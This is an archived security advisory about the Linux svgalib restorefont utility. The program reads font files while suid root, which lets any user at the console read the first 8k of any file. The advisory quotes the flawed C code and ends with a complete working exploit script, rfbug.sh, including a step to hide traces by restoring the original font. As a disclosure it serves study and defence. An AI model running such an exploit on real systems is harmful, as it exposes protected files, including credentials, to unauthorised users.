home *** CD-ROM | disk | FTP | other *** search
-
-
-
-
-
-
- Linux 'restorefont' Security Holes
-
- by FEH Staff
-
-
-
- Linux's svgalib utilities, required to be suid root, have a problem in that
-
- they do not revoke suid permissions before reading a file. This is exploited
-
- in the restorefont utility, but similar bugs exist in other svgalib utilities.
-
- The restorefont utility serves two functions. First, it will read a font from
-
- a file and write it to the console as the font. Second, it will read a font
-
- from the console and write it out to a file. Luckily, the specific bug
-
- in restorefont can only be exploited if someone is at the console, reducing
-
- its overall impact on the security of the system as a whole.
-
- In writing the utilities, the authors are cognizant of the fact that when
-
- writing out the font, suid permissions must first be given up; it is in fact
-
- commented as such in the code. However, when reading in a font, the program
-
- is still running with full suid root permissions. This allows us to read in
-
- any file for the font that root could access (basically, anything).
-
- The applicable code to read in the file is shown below:
-
-
-
- #define FONT_SIZE 8192
-
- unsigned char font[FONT_SIZE];
-
-
-
- if (argv[1][1] == 'r') {
-
- FILE *f;
-
- f = fopen(argv[2], "rb");
-
- if (f == NULL) {
-
- error:
-
- perror("restorefont");
-
- exit(1);
-
- }
-
- if(1!=fread(font, FONT_SIZE, 1, f))
-
- {
-
- if(errno)
-
- goto error;
-
- puts("restorefont: input file corrupted.");
-
- exit(1);
-
- }
-
- fclose(f);
-
-
-
- We can see from this that the file to be read in has to be at least 8k,
-
- as if it is not, the program will produce an error and exit. If the file
-
- is at least 8k, the first 8k are read into the buffer, and the program
-
- proceeds to set whatever the contents of the file are to the font:
-
- vga_disabledriverreport();
-
- vga_setchipset(VGA); /* avoid SVGA detection */
-
- vga_init();
-
- vga_setmode(G640x350x16);
-
- vga_puttextfont(font);
-
- vga_setmode(TEXT);
-
-
-
- At this point, the console will now look quite unreadable if you are
-
- reading something other than a font from that file. But, the data that
-
- is put into the font is left untouched and is readable using the -w option
-
- of restorefont. We then read the font back from video memory to a new file,
-
- and our job is complete, we have read the first 8k of a file we shouldn't
-
- have had access to. To prevent detection of having run this, we probably
-
- shouldn't leave an unreadable font on the screen, so we save and then restore
-
- the original font before reading from the file.
-
- The complete exploit is shown below:
-
-
-
- Program: restorefont, a svgalib utility
-
- Affected Operating Systems: linux
-
- Requirements: logged in at console
-
- Security Compromise: user can read first 8k of any file of at least
-
- 8k in size on local filesystems
-
- Synopsis: restorefont reads a font file while suid root,
-
- writing it to video memory as the current vga
-
- font; anyone at console can read the current
-
- font to a file, allowing you to use video memory
-
- as an 8k file buffer.
-
-
-
- rfbug.sh:
-
- #!/bin/sh
-
- restorefont -w /tmp/deffont.tmp
-
- restorefont -r $1
-
- restorefont -w $2
-
- restorefont -r /tmp/deffont.tmp
-
- rm -f /tmp/deffont.tmp
-
-
